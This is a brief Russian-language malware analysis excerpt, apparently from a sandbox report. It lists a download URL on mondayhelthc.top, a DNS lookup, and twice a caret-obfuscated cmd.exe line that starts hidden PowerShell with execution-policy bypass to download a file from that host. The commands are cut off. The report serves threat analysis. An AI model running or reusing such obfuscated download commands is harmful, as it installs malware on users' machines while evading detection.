Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^o^WeRSHeLL.^ex^e^ -^exE^cUTIO^nPoLI^CY ^BYp^ASS -n^OP^RoFILE -WinDOWs^tY^LE^ hIDD^eN^ (nEW^-oB^JeCT^ sySt^e^m.^ne^t.WebCLi^ENT^)^.^D^O^wn^lOA^Dfil^E('http://mondayhelth...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /C "P^o^WeRSHeLL.^ex^e^ -^exE^cUTIO^nPoLI^CY ^BYp^ASS -n^OP^RoFILE -WinDOWs^tY^LE^ hIDD^eN^ (nEW^-oB^JeCT^ sySt^e^m.^ne^t.WebCLi^ENT^)^.^D^O^wn^lOA^Dfil^E('http://mondayhelth...' (со скрытым окном)